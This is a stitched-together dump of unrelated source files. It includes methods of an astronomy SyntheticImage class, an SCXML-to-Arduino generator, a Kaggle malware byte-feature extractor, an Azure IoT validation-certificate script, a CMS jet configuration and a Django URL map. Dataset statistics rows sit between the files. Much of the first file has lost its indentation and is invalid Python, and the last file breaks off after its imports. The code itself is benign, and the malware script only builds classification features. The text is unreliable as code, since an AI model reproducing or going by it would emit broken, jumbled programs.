        s = ConvertUnits(wav=self.wav, val=self.val)
        self.val = s.get_unit(in_units=self.unit_in, out_units=self.unit_out, input_resolution=self.resolution['arcsec'])
        self.units = self.unit_out
def extinction(self, A_v, input_opacities=None):
'''
Accounts for reddening.
Parameters
----------
A_v : Value of the visible extinction.
input_opacities : ``None``, str
If ``None`` standard extinction law is used.
Otherwise a e. g. input_opacities.txt file can be passed
as a str to read an opacity file with column #1 wav in microns
and column #2 in cm^2/g.
Default is ``None``.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: extinction'
# read own extinction law
if input_opacities is None:
t = np.loadtxt(ROOT + 'database/extinction/extinction_law.txt')
else:
t = np.loadtxt(input_opacities)
wav_ext = t[:, 0]
k_lam = t[:, 1]
# wav_ext monotonically increasing
if wav_ext[0] > wav_ext[1]:
wav_ext = wav_ext[::-1]
k_lam = k_lam[::-1]
k_v = np.interp(0.550, wav_ext, k_lam)
# interpolate to get A_int for a certain wavelength
k = np.interp(self.wav, wav_ext, k_lam)
A_int_lam = A_v * (k / k_v)
# apply extinction law
val_ext = self.val * 10 ** (-0.4 * A_int_lam)
# return SimulateImage
i = SyntheticImage(self)
i.val = val_ext
i.stage = stage
i.log.append(i.stage)
return i
def change_resolution(self, new_resolution, grid_plot=None):
'''
Changes the resolution of val image.
Parameters
----------
new_resolution : Resolution which the val array should get in
``arcsec/pixel.``
grid_plot : ``None``, ``True``
If ``True`` old and new resolution is visualized in a plot.
Default is ``None``.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: change_resolution'
# debugging comment
logger.debug('-' * 70)
logger.debug(stage)
logger.debug('-' * 70)
logger.debug('total value before zoom : ' + str('%1.4e' % np.sum(self.val)) + ' ' + str(self.units))
# match resolution of psf and val slice
f = ConservingZoom(array=self.val, initial_resolution=self.resolution['arcsec'], new_resolution=new_resolution)
zoomed_val = f.zoom()
# average after changing resolution for MJy/sr
if self.units == 'MJy/sr' or self.units == 'Jy/arcsec^2':
# size of new pixel in units of old pixel
size = new_resolution ** 2 / self.resolution['arcsec'] ** 2
zoomed_val = zoomed_val / size
if grid_plot is not None:
f.zoom_grid(self.name)
# debugging comment
logger.debug('total val after zoom : ' + str('%1.4e' % np.sum(zoomed_val)) + ' ' + str(self.units))
# return SimulateCube
i = SyntheticImage(self)
i.val = zoomed_val
i.stage = stage
i.log.append(i.stage)
i.FOV = (f.len_nx / f.len_nrx * self.FOV[0], f.len_ny / f.len_nry * self.FOV[1])
return i
def central_pixel(self, dx, dy):
'''
Move array right and up to create a central pixel.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: central_pixel'
# match resolution of psf and val slice
ce = central(array=self.val, dx=dx, dy=dy)
len_x_old = float(self.pixel[0])
len_x_new = float(len(ce[:,0]))
len_y_old = float(self.pixel[1])
len_y_new = float(len(ce[0,:]))
old_FOV = self.FOV
new_FOV = (len_x_new / len_x_old * old_FOV[0], len_y_new / len_y_old * old_FOV[1])
# return SimulateCube
i = SyntheticImage(self)
i.val = ce
i.stage = stage
i.log.append(i.stage)
i.FOV = new_FOV
return i
def convolve_psf(self, psf):
'''
Convolves the val image with a PSF of choice.
Parameters
----------
psf : GaussianPSF, FilePSF, database, FunctionPSF
* GaussianPSF(self, diameter): Convolves val with Gaussian PSF.
* FilePSF(self, psf_file, condensed) : Reads PSF from input file.
* database : object
If PSF ``name_PSF`` from FluxCompensator database is used.
* FunctionPSF(self, psf_function, width): Convolves defined PSF.
2D val image of SyntheticImage.val convolved with PSF.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: convolve_PSF'
# debugging comments
if isinstance(psf, GaussianPSF):
logger.debug('-' * 70)
logger.debug(stage + 'with GaussianPSF')
logger.debug('-' * 70)
# convolve val with classes GaussianPSF, FilePSF and FunctionPSF
val = psf.convolve(wav=self.wav, array=self.val, resolution=self.resolution)
# return SyntheticImage
i = SyntheticImage(self)
i.stage = stage
i.log.append(i.stage)
i.val = np.array(val)
return i
def add_noise(self, mu_noise, sigma_noise, seed=None, diagnostics=None):
'''
Adds normal distributed noise to the val image of SyntheticImage.
Parameters
----------
mu_noise : float
Mean of the normal distribution.
Good choice: mu_noise = 0.
sigma_noise : float
Standard deviation of the normal distribution.
Good choice arround:
* ``'ergs/cm^2/s'`` : sigma_noise = 10.**(-13)
* ``'ergs/cm^2/s/Hz'`` : sigma_noise = 10.**(-26)
* ``'Jy'`` : sigma_noise = 10.**(-3)
* ``'mJy'`` : sigma_noise = 10.**(-1)
* ``'MJy/sr'`` : sigma_noise = 10.**(-10)
seed : float, ``None``
When float seed fixes the random numbers to a certain sequence in order to create reproducible results.
Default is ``None``.
diagnostics : truetype
When ``True`` noise array is stored in a fits file.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: add_noise'
if sigma_noise != 0. and sigma_noise != 0:
if seed is not None:
np.random.seed(seed=seed)
noise = normal(mu_noise, sigma_noise, self.pixel)
if sigma_noise == 0. or sigma_noise == 0:
noise = np.zeros(self.pixel)
# Get noise.fits file
if diagnostics is True:
fits.writeto(self.name + '_' + 'process-output_SI-noise.fits', noise, clobber=True)
# add noise if val is already collapsed (x, y)
val = self.val.copy() + noise
# return SyntheticImage
i = SyntheticImage(self)
i.stage = stage
i.log.append(i.stage)
i.val = np.array(val)
return i
    def get_total_val(self):
        '''
        Collapses the val image of SyntheticImage into a 0D val array.

        Surface-brightness maps (MJy/sr, Jy/arcsec^2) are converted to Jy
        per pixel before summing, since surface brightness cannot be summed
        directly, and converted back afterwards.

        Returns
        -------
        flux : SyntheticFlux
        '''

        stage = 'SyntheticImage: get_total_val'

        # per-pixel surface brightness -> flux density before summing
        if self.unit_out == 'MJy/sr' or self.unit_out == 'Jy/arcsec^2':
            s = ConvertUnits(wav=self.wav, val=self.val)
            val = s.get_unit(in_units=self.units, out_units='Jy', input_resolution=self.resolution['arcsec'])
        else: val = self.val

        # collapse 2D image to a single scalar val
        total_val = np.sum(val)

        # back to surface brightness; resolution * pixel count presumably
        # treats the full FOV as one big pixel — TODO confirm intent
        if self.unit_out == 'MJy/sr' or self.unit_out == 'Jy/arcsec^2':
            s = ConvertUnits(wav=self.wav, val=total_val)
            total_val = s.get_unit(in_units='Jy', out_units=self.unit_out, input_resolution=self.resolution['arcsec'] * self.pixel[0])

        # return SyntheticFlux
        # local import avoids a circular dependency with flux.py
        from .flux import SyntheticFlux
        f = SyntheticFlux(self)
        f.log.append(stage)
        f.stage = 'SyntheticFlux: initial'
        f.log.append(f.stage)
        f.val = np.array(total_val)

        return f
    def plot_image(self, prefix=None, name=None, multi_cut=None, single_cut=None, set_cut=None, dpi=None):
        '''
        Plots the val image of SyntheticImage. The wavelength interval
        around the central wavelength labels the plot.

        Parameters
        ----------

        prefix : str
            Name of the image. Default naming chain is switched off.

        name : str
            Name of image within the default naming chain to distinguish the
            plot files. E. g. 'PSF_gaussian'

        multi_cut : ``True``, ``None``

            * ``True`` : plots chosen image slice at cuts of [100, 99, 95, 90]%.
            * ``None`` : no multi-plot is returned.

            Default is ``None``.

        single_cut : float [0,100], ``None``

            * float : cut level for single plot of image slice.
            * ``None`` : no single plot is returned.

        set_cut : tuple, ``None``

            * tuple : set_cut(v_min, v_max)
              Minimal and maximal physical val presented in the colorbars.
            * ``None`` : no plot with minimal and maximal cut is returned.

            Default is ``None``.

        dpi  :  ``None``, scalar > 0
            The resolution in dots per inch.
            ``None`` is default and will use the val savefig.dpi
            in the matplotlibrc file.

        Returns
        -------
        image : SyntheticImage
        '''

        stage = 'SyntheticImage: plot_image'
        if prefix is None and name is None:
            raise Exception('If prefix name is not given, you need to give the a name to enable the default naming chain.')

        if prefix is not None:
            # NOTE(review): the second branch uses `and`, so passing
            # multi_cut=None with only ONE of single_cut/set_cut is accepted;
            # confirm this asymmetric combination rule is intended.
            if multi_cut is True and (single_cut is not None or set_cut is not None):
                raise Exception('If prefix naming is enabled only one plotting option can be chosen.')
            elif multi_cut is None and (single_cut is not None and set_cut is not None):
                raise Exception('If prefix naming is enabled only one plotting option can be chosen.')

        # MakePlots renders and saves the figure as a side effect; the
        # returned instance is not used further
        plot = MakePlots(prefix=prefix, name=name, input_array=SyntheticImage(self), multi_cut=multi_cut, single_cut=single_cut, set_cut=set_cut, dpi=dpi)

        # return SyntheticImage
        i = SyntheticImage(self)
        i.stage = stage
        i.log.append(i.stage)

        return i
def add_to_observation(self, fits_file, name, position_pix=None, position_world=None, zero_edges=None):
'''
Blends the modeled realistic synthetic observation to a real observation in a fits file.
Parameters
----------
fits_file : str
fits_file of the observation.
name : str
Name of the output fits file.
position_pix : list, ``None``
Center position of the model in observation pixel coordinates.
Default is ``None``.
position_world : list, ``None``
Center position of the model in observation world coordinates.
Default is ``None``.
zero_edges : ``True``, ``None``
If ``True`` edges of model are normalized to zero.
Default is ``None``.
Returns
-------
image : SyntheticImage
'''
stage = 'SyntheticImage: add_to_observation'
# world coordinates from fits_file
w = WCS(fits_file)
if position_world is None and position_pix is None:
raise Exception('WARNING: Position of model center needs to be given either in world or pixel coordinates.')
if position_pix is not None:
pos = position_pix
p_x_pos, p_y_pos = pos[0], pos[1]
else:
pos = position_world
p_x_pos, p_y_pos = w.wcs_world2pix(pos[0], pos[1], 1)
# center position in pixel and adjust position in current grid
x_round = np.round(p_x_pos, 0)
x_int = int(p_x_pos)
y_round = np.round(p_y_pos, 0)
y_int = int(p_y_pos)
# even or odd
if len(self.val[0]) % 2 == 0 and len(self.val[1]) % 2 == 0:
pos = np.array([x_round, y_round])
else:
if x_int == int(x_round):
if y_int == int(y_round):
pos = np.array([x_round + 0.5, y_round + 0.5])
else:
pos = np.array([x_round + 0.5, y_round - 0.5])
else:
if y_int == int(y_round):
pos = np.array([x_round - 0.5, y_round + 0.5])
else:
pos = np.array([x_round - 0.5, y_round - 0.5])
# limits of model in observation
start_x = pos[0] - len(self.val[0]) / 2.
stop_x = pos[0] + len(self.val[0]) / 2.
start_y = pos[1] - len(self.val[1]) / 2.
stop_y = pos[1] + len(self.val[1]) / 2.
# normalized that edges are zero
if zero_edges is True:
model = self.val.copy() - np.min(self.val)
else:
model = self.val.copy()
# open fits_file
hdulist = fits.open(fits_file)
hdu = hdulist[0]
header = hdu.header
if np.allclose(np.abs(header['CDELT1'] * 3600), self.resolution['arcsec']) is not True:
raise Exception('WARNING: make sure that resolution of observation and model are the same! E. g. change resolution of FC_object first.')
image = hdu.data
# add model to observation
image[start_y:stop_y, start_x:stop_x] = image[start_y:stop_y, start_x:stop_x] + model
# store to name.fits file
fits.writeto(name + '.fits', image, clobber=True)
# return SyntheticImage
i = SyntheticImage(self)
i.stage = stage
i.log.append(i.stage)
return i
    def add_field_stars(self, extinction_map, database=None, star_file=None, seed=None, ISMextinction=None):
        '''
        Adds field stars to synthetic image.

        NOTE(review): this method still uses Python 2 ``print`` statements.

        Parameters
        ----------

        extinction_map : object
            Created with ``fluxcompensator.utils.fieldstars.extract_extinction_map``.

        database : dict, ``None``
            Dictionary sets the parameters for field stars loaded for the respective
            band from the built-in database.

            dict = {'number':200, 'distance_range':[3*kpc, 50*kpc], 'ground': 0.02}

            The dictionary is structured as follows:

            * ``'number'`` : int in [0,288]
            * ``'distance_range'`` : list
                Distance lower and upper limit in units of cm
            * ``'ground'`` : str, float
                Distribution of stars before (``'foreground'``) or behind (``'background'``) the synthetic object.
                When ``'ground'`` is a ``float`` in the limits of [0,1] then this is the fraction of foreground stars.

            Default is ``None``.

        star_file : str, ``None``
            To load individual file with field stars in the format of (distance[pc], mag[band]).
            Default is ``None``.

        seed : int, ``None``
            To create reproducible results for the positions of field stars.
            Default is ``None``.

        ISMextinction : float, ``None``
            Optical extinction A_V along the line of sight in units mag/kpc.
            Default is ``None``.

        Returns
        -------
        image : SyntheticImage
        '''

        stage = 'SyntheticImage: add_field_stars'

        # make sure resolution and PSF was not applied before
        if 'SyntheticImage: convolve_PSF' in self.log or 'SyntheticCube: convolve_PSF' in self.log \
                or 'SyntheticImage: change_resolution' in self.log \
                or 'SyntheticCube: change_resolution' in self.log:
            raise Exception('WARNING: Adding field stars should happen before changing resolution or convolution with PSF.')

        # make sure that filter was applied before
        if 'SyntheticCube: convolve_filter' not in self.log:
            raise Exception('WARNING: Image must be convolved with the transmission of a detector.')

        if extinction_map.shape != self.val.shape:
            raise Exception('WARNING: Extinction map and val of SyntheticImage do not have the same dimension.')

        # load file or give parameters to read from database
        if database is None and star_file is None:
            raise Exception('WARNING: Either database or star_file need to be different from None.')

        # read from database
        if database is not None:
            from utils.fieldstars import get_stars_from_database
            mag, star_distance = get_stars_from_database(band=self.filter['name'], number=database['number'],
                                                         distance_range=database['distance_range'], ground=database['ground'],
                                                         object_distance=self.distance, seed=seed)

        # read field star data from file, distance in pc, mag in magnitudes
        pc = 3.08568025e+18
        if database is None and star_file is not None:
            print 'CAUTION: only stars in the same band as the image should be loaded.'
            print 'CAUTION: units of distance is in pc, stellar photometry in mag.'
            f = np.loadtxt(star_file)
            star_distance = f[:,0] * pc    # pc>cm
            mag = f[:,1]

        # ensure that random numbers are the same every time
        if seed is not None:
            np.random.seed(seed)

        # random pixel position of every star; extinction of the synthetic
        # object applies only to stars behind it
        x = np.random.uniform(0, self.pixel[0], len(mag)).astype('int')
        y = np.random.uniform(0, self.pixel[1], len(mag)).astype('int')
        A_obj = extinction_map[x,y]

        # convert to from A_v to A_filter
        print 'CAUTION: Extinction law from Kim et al. is used.'
        wav_ext, k_lam = np.loadtxt(ROOT + 'database/extinction/extinction_law.txt', unpack=True)
        k_v = np.interp(0.550, wav_ext, k_lam)
        k = np.interp(self.wav, wav_ext, k_lam)
        A_filter = A_obj * (k / k_v)

        # redden only stars at or behind the object distance
        MAG_ext = np.where([star_distance[i] >= self.distance for i in range(len(star_distance))], mag + A_filter, mag)

        if ISMextinction is not None:
            # additional line-of-sight ISM extinction, scaled per kpc of distance
            ISM_extinction_filter = ISMextinction * (k / k_v)
            MAG_ext_ISM = np.where([star_distance[i] >= self.distance for i in range(len(star_distance))], MAG_ext + ISM_extinction_filter * star_distance/(1e3 * pc), MAG_ext)
            MAG_ext = MAG_ext_ISM

        # zero-point of the current band from the built-in filter database
        import database.missions as filters
        zero_point = getattr(filters, self.filter['name'] + '_ZERO')
        wav_1D = np.ones(np.shape(MAG_ext))*self.wav

        # converting mag to flux
        flux = ConvertUnits(wav=wav_1D, val=MAG_ext)
        if self.units == 'MJy/sr' or self.units == 'Jy/arcsec^2':
            starflux = flux.get_unit(in_units='mag', out_units=self.units, zero_point=zero_point, input_resolution=self.resolution['arcsec'])
        else:
            starflux = flux.get_unit(in_units='mag', out_units=self.units, zero_point=zero_point)

        # deposit each star's flux into its pixel
        add_stellar_flux = self.val.copy()
        for i in range(len(starflux)):
            add_stellar_flux[x[i],y[i]] = add_stellar_flux[x[i],y[i]] + starflux[i]

        # return SyntheticImage
        i = SyntheticImage(self)
        i.val = add_stellar_flux
        i.stage = stage
        i.log.append(i.stage)

        return i
@property
def spacing_wav(self):
'''
The property spacing_wav estimates the width of the logarithmic
spaced wav entries.
'''
if self.wav.ndim != 0:
spacing_wav = np.log10(self.wav[0] / self.wav[-1]) / (len(self.wav) - 1)
else:
spacing_wav = None
return spacing_wav
    @property
    def pixel(self):
        '''
        Tuple with the spatial extent of a ``val`` slice:

        ``x = pixel[0]``
        ``y = pixel[1]``

        For scalar or 1D ``val`` there is no spatial grid, so
        ``(None, None)`` is returned.
        '''
        # Scalar or pure SED: everything is treated as one large pixel.
        if self.val.ndim in (0, 1):
            pixel = (None, None)
        # 2D image or 3D cube: the first two axes are the spatial ones.
        if self.val.ndim in (2, 3):
            pixel = (self.val.shape[0], self.val.shape[1])
        # NOTE(review): for ndim > 3 neither branch runs and this raises
        # UnboundLocalError; val is apparently never more than 3D here.
        return pixel
    @property
    def shape(self):
        '''
        String describing the current shape of the ``val`` array:

        scalar: ``'()'``
        1D:     ``'(wav)'``
        2D:     ``'(x, y)'``
        3D:     ``'(x, y, wav)'``
        '''
        if self.val.ndim == 0:
            shape = '()'
        if self.val.ndim == 1:
            shape = '(wav)'
        if self.val.ndim == 2:
            shape = '(x, y)'
        if self.val.ndim == 3:
            shape = '(x, y, wav)'
        # NOTE(review): ndim > 3 would leave ``shape`` unbound and raise here.
        return shape
    @property
    def resolution(self):
        '''
        Current angular resolution per pixel, derived from the field of view,
        the number of pixels and the distance to the object:

        resolution in arcsec per pixel : ``resolution['arcsec']``
        resolution in rad per pixel    : ``resolution['rad']``

        If ``val`` has no spatial axes (``pixel[0] is None``) the whole field
        of view is treated as a single pixel.
        '''
        resolution = {}
        if self.pixel[0] is None:
            # SED / scalar case: one pixel spanning the full FOV.
            resolution['rad'] = self.FOV[0] / 1. / self.distance
        else:
            # Small-angle approximation: angle = physical size / distance.
            resolution['rad'] = self.FOV[0] / self.pixel[0] / self.distance
        resolution['arcsec'] = np.degrees(resolution['rad']) * 3600
        return resolution
| 33.9547 | 175 | 0.550797 | 29,475 | 0.98309 | 0 | 0 | 2,006 | 0.066907 | 0 | 0 | 16,063 | 0.535755 |
e2c813723c1876d28ad71bddb2cb82d4afe3cc1c | 435 | py | Python | generator.py | madkira/SCXML_to_FSM_for_Arduino | 2e2443eca70ff6d5a8b8ac8c32b0c7e1d4440201 | [
"MIT"
] | 1 | 2020-05-13T23:03:19.000Z | 2020-05-13T23:03:19.000Z | generator.py | madkira/SCXML_to_FSM_for_Arduino | 2e2443eca70ff6d5a8b8ac8c32b0c7e1d4440201 | [
"MIT"
] | null | null | null | generator.py | madkira/SCXML_to_FSM_for_Arduino | 2e2443eca70ff6d5a8b8ac8c32b0c7e1d4440201 | [
"MIT"
] | 1 | 2019-01-20T12:46:37.000Z | 2019-01-20T12:46:37.000Z | #!/usr/bin/python
import argparse
from src.SCXML_Parser.Scxml_parsor import Scxml_parsor
from src.arduino_helper.generate_fsm import generate_fsm
def main():
    """Parse CLI arguments, load the SCXML file and generate the Arduino FSM.

    Accepts ``-f <path>`` for the input SCXML file (default: ``fsm.xml``).
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('-f', action='store', dest='file', type=str,
                            required=False, default="fsm.xml")
    inargs = arg_parser.parse_args()
    print("Beginning of the arduino fsm generator")
    # BUG FIX: the original rebound the single name ``parser`` from the
    # argparse parser to the SCXML model; distinct names avoid the confusion.
    scxml_model = Scxml_parsor(inargs.file)
    generate_fsm(scxml_model)
    print("End")


if __name__ == "__main__":
    # Guarding the entry point keeps the module importable without side effects.
    main()
e2c87ee36a16287beb7f717f937785ecfe37b5d0 | 769 | py | Python | data/external/repositories/145085/kaggle_Microsoft_Malware-master/kaggle_Microsoft_malware_full/rebuild_code.py | Keesiu/meta-kaggle | 87de739aba2399fd31072ee81b391f9b7a63f540 | [
"MIT"
] | 1 | 2015-11-08T05:19:43.000Z | 2015-11-08T05:19:43.000Z | microsoft malware/Malware_Say_No_To_Overfitting/kaggle_Microsoft_malware_small/rebuild_code.py | bikash/kaggleCompetition | c168f5a713305f6cf6ef41db60d8b1f4cdceb2b1 | [
"Apache-2.0"
] | null | null | null | microsoft malware/Malware_Say_No_To_Overfitting/kaggle_Microsoft_malware_small/rebuild_code.py | bikash/kaggleCompetition | c168f5a713305f6cf6ef41db60d8b1f4cdceb2b1 | [
"Apache-2.0"
] | 1 | 2019-12-04T08:23:33.000Z | 2019-12-04T08:23:33.000Z | import os,array
import pickle
import numpy as np
import sys
# Python 2 script: build a fixed-width (2000-column) raw-byte feature matrix
# from the <id>.asm files of the samples listed in the pickled id list.
xid=pickle.load(open(sys.argv[1]))  # argv[1]: pickle with the list of sample ids
asm_code_path=sys.argv[2]  # argv[2]: directory containing <id>.asm files
train_or_test=asm_code_path.split('_')[-1]  # suffix after the last '_' names the output
X = np.zeros((len(xid),2000))  # one 2000-byte row per sample
for cc,i in enumerate(xid):
    f=open(asm_code_path+'/'+i+'.asm')
    ln = os.path.getsize(asm_code_path+'/'+i+'.asm') # length of file in bytes
    width = int(ln**0.5)
    # Drop the ragged tail so the byte count is a multiple of ``width``.
    rem = ln%width
    a = array.array("B") # uint8 array
    a.fromfile(f,ln-rem)
    f.close()
    a=np.array(a)
    #im = Image.open('asmimage/'+i+'.png')
    # In-place resize: truncates or zero-pads to exactly 2000 entries.
    a.resize((2000,))
    #im1 = im.resize((64,64),Image.ANTIALIAS); # for faster computation
    #des = leargist.color_gist(im1)
    X[cc] = a#[0,:1000] #des[0:320]
    print cc*1.0/len(xid)
pickle.dump(X,open('Xcode_'+train_or_test+'.p','w'))
| 29.576923 | 78 | 0.63329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.305592 |
e2c91d72449fad349a8ca2ab17e151f78840d950 | 1,961 | py | Python | x509_3_validation_certs.py | askpatrickw/azure_iot_x509_helpers | 2bb9f1722f8e018786fcc05589adf40f7597bfab | [
"Unlicense"
] | null | null | null | x509_3_validation_certs.py | askpatrickw/azure_iot_x509_helpers | 2bb9f1722f8e018786fcc05589adf40f7597bfab | [
"Unlicense"
] | null | null | null | x509_3_validation_certs.py | askpatrickw/azure_iot_x509_helpers | 2bb9f1722f8e018786fcc05589adf40f7597bfab | [
"Unlicense"
] | null | null | null | """
Generate Validation Certificate bases on Azure IoT Hub Verification Code
Based on sample code from the cryptography library docs:
https://cryptography.io/en/latest/x509/tutorial/#creating-a-self-signed-certificate
"""
import datetime
from pathlib import Path
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography import x509
from cryptography.x509.oid import NameOID
from config import AZURE_IOT_VERIFICATION_CODE, COMPANY_INFO, PASSPHRASE, PATH_TO_CERTS, VALID_DAYS
# For every key listed in PASSPHRASE, load its private key and issue a
# short-lived self-signed certificate whose Common Name is the verification
# code generated by Azure IoT Hub, proving possession of that private key.
for key_name in PASSPHRASE.keys():
    # Load the encrypted private key produced for this certificate chain.
    with open(f"{PATH_TO_CERTS}{key_name}/key.pem", "rb") as key_file:
        pem_data = key_file.read()
    key = serialization.load_pem_private_key(pem_data, PASSPHRASE[key_name])
    # Issuer: the company identity from config.
    issuer = x509.Name(
        [
            x509.NameAttribute(NameOID.COUNTRY_NAME, COMPANY_INFO['COUNTRY']),
            x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, COMPANY_INFO['STATE']),
            x509.NameAttribute(NameOID.LOCALITY_NAME, COMPANY_INFO['CITY']),
            x509.NameAttribute(NameOID.ORGANIZATION_NAME, COMPANY_INFO['NAME']),
        ]
    )
    # Subject CN must be exactly the verification code Azure IoT Hub issued.
    subject = x509.Name(
        [x509.NameAttribute(NameOID.COMMON_NAME, AZURE_IOT_VERIFICATION_CODE[key_name]), ]
    )
    cert = (
        x509.CertificateBuilder()
        .subject_name(subject)
        .issuer_name(issuer)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(datetime.datetime.utcnow())
        .not_valid_after(
            datetime.datetime.utcnow()
            + datetime.timedelta(days=VALID_DAYS)
        )
        .sign(key, hashes.SHA256())
    )
    # Write the PEM-encoded certificate next to its key.
    path = Path(f"{PATH_TO_CERTS}{key_name}")
    path.mkdir(parents=True, exist_ok=True)
    filename = f"{path}/validation_certificate.pem"
    with open(filename, "wb") as f:
        f.write(cert.public_bytes(serialization.Encoding.PEM))
    # BUG FIX: the message previously printed the literal "(unknown)" instead
    # of the path of the certificate that was just written.
    print(f"{key_name.capitalize()} Validation Cert: {filename}")
| 36.314815 | 99 | 0.704233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 420 | 0.214176 |
e2c9a924fe0897e10007fced991eb0673d76230d | 1,307 | py | Python | PuThresholdTuning/python/akPu4PFJetSequence10_cff.py | mverwe/JetRecoValidation | ee8b3fd94bac16390b367dc5030489738ff67958 | [
"CC0-1.0"
] | null | null | null | PuThresholdTuning/python/akPu4PFJetSequence10_cff.py | mverwe/JetRecoValidation | ee8b3fd94bac16390b367dc5030489738ff67958 | [
"CC0-1.0"
] | null | null | null | PuThresholdTuning/python/akPu4PFJetSequence10_cff.py | mverwe/JetRecoValidation | ee8b3fd94bac16390b367dc5030489738ff67958 | [
"CC0-1.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.jets.akPu4PFJetSequence_PbPb_mc_cff import *
# PU jets rebuilt with a 10 GeV threshold for the pileup subtraction:
# every module of the standard akPu4PF sequence is cloned and re-pointed at
# the "akPu4PFJets10" collection.
akPu4PFmatch10 = akPu4PFmatch.clone(src = cms.InputTag("akPu4PFJets10"))
akPu4PFparton10 = akPu4PFparton.clone(src = cms.InputTag("akPu4PFJets10"))
akPu4PFcorr10 = akPu4PFcorr.clone(src = cms.InputTag("akPu4PFJets10"))
# PAT jets wired to the 10 GeV corrections and the MC matching clones above.
akPu4PFpatJets10 = akPu4PFpatJets.clone(jetSource = cms.InputTag("akPu4PFJets10"),
                                        jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPu4PFcorr10")),
                                        genJetMatch = cms.InputTag("akPu4PFmatch10"),
                                        genPartonMatch = cms.InputTag("akPu4PFparton10"),
                                        )
# Analyzer reads the 10 GeV PAT jets; doSubEvent=True is presumably for
# sub-event MC bookkeeping in embedded samples - confirm with the analyzer.
akPu4PFJetAnalyzer10 = akPu4PFJetAnalyzer.clone(jetTag = cms.InputTag("akPu4PFpatJets10"), doSubEvent = cms.untracked.bool(True) )
# Run order: gen-jet match -> parton match -> corrections -> PAT jets -> analyzer.
akPu4PFJetSequence10 = cms.Sequence(akPu4PFmatch10
                                    *
                                    akPu4PFparton10
                                    *
                                    akPu4PFcorr10
                                    *
                                    akPu4PFpatJets10
                                    *
                                    akPu4PFJetAnalyzer10
                                    )
| 52.28 | 130 | 0.561591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 172 | 0.131599 |
e2cb06b712c978cf2cdaaef7401e96574a50da51 | 2,796 | py | Python | annotationweb/urls.py | andreped/annotationweb | 80b0e96a4dbefdc39a83e6cf9ffb0b623cf417ee | [
"MIT"
] | null | null | null | annotationweb/urls.py | andreped/annotationweb | 80b0e96a4dbefdc39a83e6cf9ffb0b623cf417ee | [
"MIT"
] | null | null | null | annotationweb/urls.py | andreped/annotationweb | 80b0e96a4dbefdc39a83e6cf9ffb0b623cf417ee | [
"MIT"
] | null | null | null | from django.conf.urls import include
from django.urls import path
from django.contrib import admin
from . import views
# Namespace used when reversing these URLs (e.g. 'annotationweb:index').
app_name = 'annotationweb'

urlpatterns = [
    # Landing page and dataset management.
    path('', views.index, name='index'),
    path('datasets/', views.datasets, name='datasets'),
    path('add-image-sequence/<int:subject_id>/', views.add_image_sequence, name='add_image_sequence'),
    path('show_frame/<int:image_sequence_id>/<int:frame_nr>/<int:task_id>/', views.show_frame, name='show_frame'),
    path('new-dataset/', views.new_dataset, name='new_dataset'),
    path('delete-dataset/<int:dataset_id>/', views.delete_dataset, name='delete_dataset'),
    path('dataset-details/<int:dataset_id>/', views.dataset_details, name='dataset_details'),
    # Subjects and image sequences inside a dataset.
    path('new-subject/<int:dataset_id>/', views.new_subject, name='new_subject'),
    path('delete-subject/<int:subject_id>/', views.delete_subject, name='delete_subject'),
    path('subject-details/<int:subject_id>/', views.subject_details, name='subject_details'),
    path('delete-sequence/<int:sequence_id>/', views.delete_sequence, name='delete_sequence'),
    # Annotation tasks, labels and import/export.
    path('delete-task/<int:task_id>/', views.delete_task, name='delete_task'),
    path('show-image/<int:image_id>/<int:task_id>/', views.show_image, name='show_image'),
    path('new-task/', views.new_task, name='new_task'),
    path('task/<int:task_id>/', views.task, name='task'),
    path('reset-filters/<int:task_id>/', views.reset_filters, name='reset_filters'),
    path('new-label/', views.new_label, name='new_label'),
    path('task-description/<int:task_id>/', views.task_description, name='task_description'),
    path('export/<int:task_id>/', views.export, name='export'),
    path('export-options/<int:task_id>/<int:exporter_index>/', views.export_options, name='export_options'),
    path('import/<int:dataset_id>/', views.import_data, name='import'),
    path('import-options/<int:dataset_id>/<int:importer_index>/', views.import_options, name='import_options'),
    # Annotation views. NOTE: both 'annotate' routes deliberately share a
    # name; Django picks the pattern whose arguments match when reversing.
    path('annotate/<int:task_id>/', views.annotate_next_image, name='annotate'),
    path('annotate/<int:task_id>/image/<int:image_id>/', views.annotate_image, name='annotate'),
    path('select-key-frames/<int:task_id>/image/<int:image_id>/', views.select_key_frames, name='select_key_frames'),
    # Admin and annotation-type sub-apps.
    path('admin/', admin.site.urls),
    path('user/', include('user.urls')),
    path('classification/', include('classification.urls')),
    path('boundingbox/', include('boundingbox.urls')),
    path('landmark/', include('landmark.urls')),
    path('cardiac/', include('cardiac.urls')),
    path('spline-segmentation/', include('spline_segmentation.urls'))
]
# This is for making statics in a development environment
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns += staticfiles_urlpatterns()
| 60.782609 | 117 | 0.718169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,391 | 0.497496 |
e2cb6ee5e64d50fb394883bc6a0cf789076e9e45 | 7,015 | py | Python | vae/decoder/vae_conv_util.py | VincentStimper/hmc-hyperparameter-tuning | a0464cd80000c7cd45a388d6a5f76c0f1a76104d | [
"MIT"
] | 2 | 2021-08-08T16:39:55.000Z | 2021-08-25T09:48:22.000Z | vae/decoder/vae_conv_util.py | VincentStimper/hmc-hyperparameter-tuning | a0464cd80000c7cd45a388d6a5f76c0f1a76104d | [
"MIT"
] | null | null | null | vae/decoder/vae_conv_util.py | VincentStimper/hmc-hyperparameter-tuning | a0464cd80000c7cd45a388d6a5f76c0f1a76104d | [
"MIT"
] | 1 | 2022-02-12T16:57:32.000Z | 2022-02-12T16:57:32.000Z | import numpy as np
import tensorflow as tf
